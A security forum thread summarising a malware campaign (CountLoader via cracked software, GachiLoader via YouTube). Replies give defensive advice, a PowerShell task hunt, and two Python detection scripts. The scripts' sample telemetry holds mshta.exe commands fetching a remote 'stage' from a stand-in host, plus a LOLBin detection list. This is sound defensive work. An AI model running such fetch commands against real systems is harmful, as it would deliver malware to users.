Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware

Brownie2019

Level 23
Thread author
Verified
Well-known
Forum Veteran
Mar 9, 2019
910
4,299
2,168
Germany
Cybersecurity researchers have disclosed details of a new campaign that has used cracked software distribution sites as a distribution vector for a new version of a modular and stealthy loader known as CountLoader.

The campaign "uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families," Cyderes Howler Cell Threat Intelligence team said in an analysis.

CountLoader was previously documented by both Fortinet and Silent Push, detailing the loader's ability to push payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The loader has been detected in the wild since at least June 2025.

The latest attack chain begins when unsuspecting users attempt to download cracked versions of legitimate software like Microsoft Word, which causes them to be redirected to a MediaFire link hosting a malicious ZIP archive, which contains an encrypted ZIP file and a Microsoft Word document with the password to open the second archive.
Read more here:
 
This lines up with a very common (and effective) “pirated installer → living-off-the-land loader → stealer” pattern, and the details in the article add a few practical detection points worth calling out.

What the article says is happening (high-level) ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))
  • Victims look for cracked software (example given: Microsoft Word) and get funneled to a file-hosting link that delivers a ZIP, plus a Word document containing the password for an inner/encrypted archive. ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))
  • Inside is a renamed legitimate Python interpreter (named “Setup.exe”) that runs a command to fetch CountLoader (notably using mshta.exe). ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))
  • Persistence is done via a Scheduled Task masquerading as Google (example task name shown: “GoogleTaskSystem136.0.7023.12”), set to run frequently for a long time, again invoking mshta.exe. ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))
  • The loader profiles the host and pulls additional stages; the observed “final” payload in that chain was an info-stealer (ACR Stealer). ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))
  • The same write-up also mentions a separate loader (“GachiLoader”) spread via compromised YouTube accounts, with heavy obfuscation and follow-on payload delivery. ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))

Practical “watch for this” items defenders/home users can use ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))
  • Unexpected mshta.exe network activity (especially launched from unusual parents like a “setup” you didn’t trust).
  • A suspicious Scheduled Task pretending to be Google (the article provides one concrete example name) that runs every ~30 minutes.
  • “Installer” bundles that include a password-in-a-document trick to get around scanners and user suspicion.
  • USB/removable-media oddities (the article says newer CountLoader adds propagation via removable drives using LNK tricks). ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))

What to do to reduce risk (without guessing if any specific file is malicious)
  • Avoid cracked software (it’s one of the highest-risk infection vectors because you’re intentionally bypassing trust and protections).
  • On Windows, consider blocking or constraining common LOLBins used for “fileless” stages—especially mshta.exe—via AppLocker/WDAC/SRP if you can (org/advanced users).
  • Keep Microsoft Defender (or another reputable AV) enabled, and turn on cloud-delivered protection / PUA blocking where available.
  • Be very wary of YouTube “download links” for installers—this is now a well-worn distribution channel, and the article explicitly highlights that angle. ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))

If someone already ran a “crack/installer” like this
I can’t verify whether any one file is clean/safe just from a description, but the safer next steps are:
  • Disconnect from the network (to stop further payload pulls).
  • Run a full scan with your resident AV plus a second opinion scanner, and consider an offline scan.
  • Check Scheduled Tasks for anything similar to the “GoogleTask…” style task and anything invoking mshta/powershell from odd locations (don’t delete blindly if you’re unsure—export the task details first).
  • Assume credentials stored in browsers/apps may be at risk if an info-stealer was involved; change passwords from a known-clean device and enable MFA.

If you want, paste the Scheduled Task command line (or screenshots of task “Actions” and “Triggers”) and the parent/child process info from your logs—then I can help you interpret whether it matches the behavior described (without making unsafe “it’s definitely clean/malicious” claims).
 
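The mshta.exe indicators in the post above (unusual parent, parent in a user-writable folder, remote URL, task-engine relaunch, outbound connection), turned into detection logic that runs over constructed process and network telemetry. This is an added example, not code from the thread, The Hacker News or Cyderes: the records imitate the fields of Sysmon process-create and network-connect events, every sample path, PID and address is constructed (the 203.0.113.0/24 documentation range stands in for an unknown external host), and the parent allowlist that treats only explorer.exe as an expected launcher of mshta.exe is an assumption to tune per environment.

```python
"""Detection logic for the mshta.exe indicators listed above.

Added example (not code from the thread, The Hacker News or Cyderes).
Records imitate the fields of Sysmon process-create and network-connect
events; all sample paths, PIDs and addresses are constructed.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from pathlib import PureWindowsPath

# Assumption: in this environment only explorer.exe (a user opening an .hta)
# is an expected parent of mshta.exe. svchost.exe is listed with taskeng.exe
# because the Task Scheduler service runs inside svchost on current Windows.
BENIGN_PARENTS = {"explorer.exe"}
TASK_ENGINES = {"taskeng.exe", "svchost.exe"}
USER_WRITABLE_HINTS = ("\\downloads\\", "\\temp\\", "\\users\\public\\")
INTERNAL_NETS = [ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]


@dataclass
class ProcEvent:            # subset of a Sysmon process-create event
    pid: int
    image: str
    parent_image: str
    command_line: str


@dataclass
class NetEvent:             # subset of a Sysmon network-connect event
    pid: int
    image: str
    dest_ip: str
    dest_port: int


def is_external(ip: str) -> bool:
    """True unless the address falls in a private, loopback or link-local range."""
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def in_user_writable_dir(path: str) -> bool:
    return any(h in path.lower() for h in USER_WRITABLE_HINTS)


def score_mshta(proc_events, net_events):
    """Map PID -> reasons for every mshta.exe process that matches an indicator."""
    net_by_pid = {}
    for n in net_events:
        net_by_pid.setdefault(n.pid, []).append(n)
    findings = {}
    for p in proc_events:
        if PureWindowsPath(p.image).name.lower() != "mshta.exe":
            continue
        parent = PureWindowsPath(p.parent_image).name.lower()
        reasons = []
        if parent in TASK_ENGINES:
            reasons.append("spawned by scheduled-task engine")
        elif parent not in BENIGN_PARENTS:
            reasons.append(f"unusual parent {parent}")
        if in_user_writable_dir(p.parent_image):
            reasons.append("parent runs from a user-writable directory")
        cl = p.command_line.lower()
        if "http://" in cl or "https://" in cl:
            reasons.append("remote URL in command line")
        for n in net_by_pid.get(p.pid, []):
            if is_external(n.dest_ip):
                reasons.append(f"outbound to {n.dest_ip}:{n.dest_port}")
                break
        if reasons:
            findings[p.pid] = reasons
    return findings


# Constructed sample telemetry: one chain shaped like the article's (Setup.exe
# in Downloads -> mshta -> remote URL -> outbound), one task-engine relaunch,
# one benign local .hta, one unrelated process.
SAMPLE_PROCS = [
    ProcEvent(4101, r"C:\Windows\System32\mshta.exe", r"C:\Users\alice\Downloads\Setup.exe",
              'mshta.exe "http://example.invalid/stage"'),
    ProcEvent(4200, r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\svchost.exe",
              'mshta.exe "http://example.invalid/stage"'),
    ProcEvent(4300, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r'mshta.exe "C:\Users\alice\Documents\report.hta"'),
    ProcEvent(4400, r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]
SAMPLE_NET = [
    NetEvent(4101, r"C:\Windows\System32\mshta.exe", "203.0.113.10", 443),
    NetEvent(4300, r"C:\Windows\System32\mshta.exe", "10.0.0.5", 80),
]

if __name__ == "__main__":
    for pid, why in score_mshta(SAMPLE_PROCS, SAMPLE_NET).items():
        print(pid, "->", "; ".join(why))
```

The benign .hta launched from explorer.exe with only an internal connection produces no finding, while the Setup.exe chain collects four reasons; in a real pipeline the reason count is a reasonable severity knob, and the parent allowlist is where most tuning happens.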
To detect and mitigate this threat, the following actions are recommended.

IOC Hunting (Scheduled Tasks). Run the following PowerShell command to check for the specific persistence mechanism described in the intel.

PowerShell:
Get-ScheduledTask | Where-Object { $_.TaskName -like "*GoogleTaskSystem*" } | Select-Object TaskName, State, @{N='Actions';E={$_.Actions.Execute}}, @{N='Arguments';E={$_.Actions.Arguments}}

If a task named GoogleTaskSystem136.0.7023.12 (or similar variations executing mshta.exe) is found, immediately disable it and isolate the host.

Monitor for mshta.exe establishing outbound network connections, especially if the parent process is a non-standard executable (like Setup.exe running from a Downloads or Temp directory). Flag any instance of mshta.exe spawned by taskeng.exe (Scheduled Task engine) that connects to unknown external IPs.

The root cause is the download of pirated software. The "password in a separate text file" tactic is a definitive red flag for malware evasion. Users should be educated that this behavior almost always indicates a malicious payload intended to bypass email/browser scanning.

If infection is suspected, reset all credentials (browser-stored passwords, session cookies) from a clean device, as ACR Stealer and Amatera are capable of exfiltrating this data before remediation can occur.
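A way to take the scheduled-task hunt above beyond a single name match: parse the verbose CSV that `schtasks /query /v /fo CSV` writes and flag tasks that fit the persistence described (a Google-styled name whose action is not the real updater, an action that runs a LOLBin such as mshta.exe, a remote URL in the action, and a short repeat interval as corroboration). This is an added example, not code from the thread or the article; the column names are taken to be the ones that export produces, which is an assumption to check against your own file, and the host name, account, rows and URL are constructed.

```python
"""Triage a verbose scheduled-task export for the persistence pattern above.

Added example, not code from the thread or the article. Input is the CSV from
`schtasks /query /v /fo CSV`; the column names are assumed to be the ones
that export produces (check against your own file). Sample rows are
constructed.
"""
import csv
import io
import re
from pathlib import PureWindowsPath

LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
           "rundll32.exe", "regsvr32.exe", "cmd.exe", "certutil.exe", "bitsadmin.exe"}
# Assumption: the genuine Google updater lives in its default install location.
GOOGLE_UPDATER_RE = re.compile(r"\\google\\update\\googleupdate\.exe", re.I)
URL_RE = re.compile(r"https?://", re.I)


def parse_interval_minutes(value):
    """'0:30:00' -> 30.0; 'Disabled', 'N/A' or blank -> None."""
    m = re.fullmatch(r"(\d+):(\d{2}):(\d{2})", value.strip())
    if not m:
        return None
    h, mi, s = (int(x) for x in m.groups())
    return h * 60 + mi + s / 60


def first_executable(task_to_run):
    """Program name from a 'Task To Run' value, quoted or bare."""
    m = re.match(r'\s*"?(.*?\.exe)', task_to_run, re.I)
    prog = m.group(1) if m else task_to_run.strip().split(" ", 1)[0]
    return PureWindowsPath(prog).name.lower()


def triage_tasks(csv_text, max_interval_min=60):
    """List (task name, reasons) for tasks matching the article's pattern.

    Frequent repetition on its own is only corroborating (real updaters
    repeat hourly too), so a task is reported only with at least one other
    reason attached.
    """
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name = row.get("TaskName", "")
        if name == "TaskName":      # the verbose export repeats its header per task folder
            continue
        cmd = row.get("Task To Run", "")
        reasons = []
        if "google" in name.lower() and not GOOGLE_UPDATER_RE.search(cmd):
            reasons.append("Google-styled name but action is not GoogleUpdate.exe")
        exe = first_executable(cmd)
        if exe in LOLBINS:
            reasons.append(f"action runs LOLBin {exe}")
        if URL_RE.search(cmd):
            reasons.append("action references a remote URL")
        strong = list(reasons)
        interval = parse_interval_minutes(row.get("Repeat: Every", ""))
        if interval is not None and interval <= max_interval_min:
            reasons.append(f"repeats every {interval:g} min")
        if strong:
            findings.append((name, reasons))
    return findings


# Constructed export: the masquerading task named in the article, the real
# Google updater task, a stock Windows task, and a repeated header line.
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run","Author","Run As User","Schedule Type","Repeat: Every","Repeat: Until: Duration"
"WS01","\GoogleTaskSystem136.0.7023.12","mshta.exe http://example.invalid/stage","WS01\alice","alice","One Time Only","0:30:00","720:00:00"
"WS01","\GoogleUpdateTaskMachineUA","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler","Google","SYSTEM","Daily","1:00:00","24:00:00"
"HostName","TaskName","Task To Run","Author","Run As User","Schedule Type","Repeat: Every","Repeat: Until: Duration"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -k -g","Microsoft Corporation","SYSTEM","Weekly","Disabled","Disabled"
'''

if __name__ == "__main__":
    for name, why in triage_tasks(SAMPLE_CSV):
        print(name, "->", "; ".join(why))
```

Only the GoogleTaskSystem row is reported: the genuine GoogleUpdateTaskMachineUA also repeats hourly, but its name resolves to GoogleUpdate.exe and it gathers no other reason, which is why the interval check is deliberately not sufficient on its own. Export the task (the post's advice) before acting on a hit, since the CSV does not carry the full trigger definition.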